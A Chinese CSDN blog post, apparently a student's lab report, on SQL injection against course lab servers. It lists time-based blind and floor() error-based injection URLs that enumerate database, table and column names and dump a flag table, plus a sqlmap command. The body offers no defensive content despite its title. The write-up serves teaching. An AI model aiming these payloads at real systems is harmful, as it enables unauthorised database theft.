SQL注入漏洞的攻击与防御

最新推荐文章于 2024-04-15 20:54:43 发布
最新推荐文章于 2024-04-15 20:54:43 发布
阅读量649 收藏 12
点赞数 1
分类专栏: 网络攻击与防御
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46273733/article/details/119670249
版权

一、实验名称

SQL注入漏洞的攻击与防御

二、实验环境(详细说明运行的系统、平台及代码等)

1、攻击机系统环境:Windows 7/8/10

2、浏览器:Firefox 53.0.2(64位)

3、浏览器插件HackBar 1.6.3.1

4、Burp Suite 1.7.11

三、实验步骤及结果

1、基于时间延迟的盲注

   打开Firefox浏览器,按F12,打开FireBug。选择“网络选项卡”

   实验网址:  http://222.18.158.243:4609/

   注入点:http://222.18.158.243:4609/?id=1

   需要学生自己构造SQL语句,获得字段个数、字段精确位置、数据库名、数据库用户名、表名、字段名、字段内容等信息。

   提示:

   http://222.18.158.243:4609/?id=1 and if(length(database())=6,sleep(1),1)%23

   FireBug中,“网络选项卡”的时间线与

http://222.18.158.243:4609/?id=1andif(length(database())=5,sleep(1),1)%23

http://222.18.158.243:4609/?id=1andif(length(database())=7,sleep(1),1)%23

   有明显区别,可以判断出数据库名长度为6

   或者,做一个1,2,3,4。。。。30的密码字典,用Burp Suite爆破,注意,在显示爆破结果页面时,Columns列需要设置勾选“Response received”

    Burp Suite使用方法参考:

http://www.360doc.com/content/16/0425/10/29967943_553593234.shtml

    可以看到6与其他的明显不同,也可以得到数据库长度为6

2、利用floor()函数进行报错注入

   提示“floor报错注入,注入点id=1”

   实验网址:  http://222.18.158.243:4606/

   注入点:http://222.18.158.243:4606/?id=1

   需要学生自己构造SQL语句,获得字段个数、字段精确位置、数据库名、数据库用户名、表名、字段名、字段内容等信息。

http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a)

http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=flag LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select flag from flag),floor(rand(0)*2))x from information_schema.tables group by x)a)

  • 实验心得

通过实验了解基于时间延迟的盲注、利用floor()函数进行报错注入的相关操作

  • 思考题

应该如何使用SQLmap进行本实验中的几个注入?

python sqlmap.py -u "http://222.18.158.243:4610/?id=1" -p "id" --current-db --batch -T "flag" --no-cast --level 5 --risk 2

cxdh47
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
3 SQL注入漏洞利用与防御
fgh123的博客
07-08 577
文章目录3.1发展历史 SQL是访问Oracle、MSQL、 Sybase、 Microsoft SQL Server和 Informⅸ等数据库服务器的标准语言 大多Web应用都要与数据库交互, 大多数的Web编程语言也提供可编程的方法来与数据库交互, 如果未对用户可控的键值过滤,就带入数据库运行,那么极有可能产生SQL注入 自SQL数据库应用于Web应用时, SQL注入就已存在, SQL注入是影响互联网企业运营且最破坏性的漏洞之一, 泄露应用程序数据库中的敏感数据, 用户姓名、密码、地址和电话
20222922 2022-2023-2 《网络攻防实践》实践十报告
qq_21274765的博客
05-10 448
本次实践动手操作了SQL注入和XSS攻击,基本了解了这两种攻击的原理,操作步骤,可能造成的危害以及一般防范方式,这对于提高网络攻防技能以及更好的开发WEB应用打下了基础。
SQL注入攻击防御方法
最新发布
qq_69100706的博客
04-15 523
由于参数值会被正确转义并严格作为数据对待,而非指令的一部分,即使输入包含恶意的SQL代码,也不会被执行。对所有用户输入进行严格的验证和过滤,确保其符合预期的数据类型、长度、格式和字符集。拒绝或清理不符合规则的输入,移除或转义可能用于SQL注入的特殊字符(如单引号、双引号、分号、注释符等)。ORM框架将对象与数据库表进行映射,自动处理数据查询和持久化,同时确保在生成SQL时对用户输入进行适当的转义或参数化。对于必须手动编写的SQL查询,确保使用适当的方法(如函数或库)对用户输入进行转义。
Javascript的调试利器:Firebug使用详解
weixin_33850015的博客
09-02 352
 Javascript的调试,是开发Web应用尤其是AJAX应用很重要的一环,目前对Javascript进行调试的工具很多,我比较喜欢使用的是Firebug。Firebug是Joe Hewitt开发的一套与Firefox集成在一起的功能强大的web开发工具,可以实时编辑、调试和监测任何页面的CSS、HTML和JavaScript。 本文主要是为初学者介绍一下Firebug的基本功能与如何使用Fi...
注入漏洞一把嗦(原理+步骤+防御
Y22Lee的博客
03-21 1237
以csdn为例,除去请求头信息,剩下的都是Head信息,其中U-A是用户的基本信息,Referer是用户的请求来源。没有回显的注入,SQL注入中最繁琐;因为没有明确的回显,所以不能直观的得到数据。只能尝试测出数据。一般盲注分为布尔盲注和时间盲注。宽字节是指占俩个以上字节的字符,而一般的字符只占一个字节,被称作单字节(窄字节)。ASCII:单字节编码GBK,UTF-8:单字节/双字节编码(区别根据范围划分,范围与ASCII保持一致)英文通常是默认占用一个字节,而汉字占用俩个字节!
Web安全之注入类漏洞详解及预防
路多辛的所思所想
01-31 856
注入类攻击是 Web 安全领域中最常见的攻击方式,注入攻击发生在当不可信的数据作为命令或者查询语句的一部分被发送给解释器的时候。预防注入类攻击的最好方法是代码审核,可以将静态的(SAST)、动态的(DAST)和交互式(IAST)的安全测试工具集成到 CI/CD 流程中,以便在部署到生产环境之前检测出并解决掉注入类安全问题。注意避免xml注入、代码注入、SQL注入、HTML注入等注入型安全问题的发生,一定要在数据拼接的地方进行安全检查,对拼接内容进行严格校验和必要的转义处理。常见的注入类漏洞及预防措施。
遍历暴力破解
weixin_46273733的博客
08-13 640
一、实验名称 暴力破解 二、实验环境(详细说明运行的系统、平台及代码等) 1、攻击机系统环境:Windows 7/8/10 2、浏览器:Firefox 53.0.2(64 位) 3、浏览器插件 HackBar 1.6.3.1 4、BurpSuite 1.7.11 三、实验步骤及结果 1 、 暴力破解 漏洞地址:http://222.18.158.243:10006/burp6.php 根据提示,管理员 IP 为:210.41.223.0/24、210.41.224.0/24 以上
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 390
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
SQL注入漏洞攻击防御方式浅析.pdf
09-19
SQL注入漏洞攻击防御方式浅析.pdf
SQL注入攻击防御
07-17
SQL注入是Internet上最危险、最有名的安全漏洞之一,《SQL注入攻击防御》是目前唯一一本专门致力于讲解SQL威胁的图书。《SQL注入攻击防御》作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的...
MySQL注入攻击防御
02-25
下面几点是注入中经常会用到的语句控制语句操作(select,case,if(),...)比较操作(=,like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有...
实验吧-简单的sql注入3 Writeup
baynk的博客
07-29 337
继续继续 过程 输入1,然后发现只有一个hello。。。好吧,肯定得盲注了,先试试闭合吧,果然还是单引号的,但是居然有报错信息,应该也可以使用报错注入吧。 然后再尝试干掉单引号的时候意外发现#居然可以用了,这真是省了不少事。。 想来想去还是使用报错注入,盲注还是交给sqlmap来解决吧。先来搞库名,用的floor(),结果来这么一出。 don't到底是个啥,又换了两种其他的报错,updatexm...
渗透攻防Web篇-SQL注入攻击中级
人人为我,我为人人
12-29 615
前言找到SQL注入漏洞后,我们可以用它来干什么呢?那么本篇文章给大家带来的就是SQL注入漏洞利用技术,现在是时候让我们去体验一下漏洞利用的乐趣了。 目录 第三节 利用SQL注入 3.1、识别数据库 3.2、UNION语句提取数据 3.3、枚举数据库 3.4、窃取哈希口令 3.5、获取WebShell 第四节 SQL盲注利用 4.1、初识SQL盲注 4.2、SQL盲注入技术-基于布尔 4.3、SQL盲注入技术-基于时间 4.4、我们的好朋友-Python 正文 第三节 利用SQL注.
Sql注入实战篇
永不垂头的博客
07-27 1282
学习笔记—Sql注入实战篇 一、编写注入的网页,用于实战。 index.php link.php 在老板火狐中开启hackbar, 进行sql注入。 Google中hackbar破解方法: https://www.fujieace.com/hacker/tools/hackbar.html 二、Sql注入基本流程(实战篇): 输入单引号报如下错误 1=1与1=2的区别:(参考链接: https://www.cnblogs.com/xyz315/p/13043950.html)第一步,判断是否
防止SQL注入
u014644574的博客
04-27 1982
防止SQL注入
【白帽子学习笔记】XSS和SQL注入
python_LC_nohtyp的博客
11-17 1531
【白帽子学习笔记】XSS和SQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSS和SQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
SQL注入攻击(攻击与防范)
主题模板站的博客
01-28 941
这些活动常常利用用户的好奇心,在用户不知道或未来允许的情况下潜入用户的PC,不知不觉中,帐户里的资金就被转移了,公司讯息也被传送出去,危害十分严重。[xp_regread]另一个有用的内置存储过程是xp_regXXXX类的函数集合(Xp_regaddmultistring,Xp_regdeletekey,Xp_regdeletevalue,Xp_regenumkeys,Xp_regenumvalues,Xp_regread,Xp_regremovemultistring,Xp_regwrite)。
SQL注入系统学习——(2)环境搭建及简单SQL命令
weixin_47075747的博客
11-27 694
mysql -uroot -p // 因为数据库密码为空所以敲两下回车就ok了万事开头难,不开头一直难。所以动起来,一起学习。这些都是一些常常能用到的 sql 注入的命令。虽然现在工具很牛逼,但是不可能永远当个脚本小子吧,工具是死的,人是活的。在实战中要灵活运用。诸君共勉。
SQL渗透与防御——(四)基于报错注入
FisrtBqy的博客
03-06 475
第四章 基于报错注入 1.User-Agent注入 修改消息头的User-Agent参数 单引号报错判断 推测语句 其源码有可能是insert into tablename value(1,2) 那么就要闭合value()中的右括号a',(select database())) # [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 2.Stacked queries堆叠注入 #可以执行多条SQL语句 select * from user;select * from u
sql注入漏洞攻击防御
05-25
下面是一些SQL注入漏洞攻击防御的方法: 攻击: 1. 基于错误消息的注入:攻击者通过发送恶意的SQL查询,来观察Web应用程序返回的错误消息,从而推断出数据库的结构和内容。 2. 基于时间的注入:攻击者可以通过在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值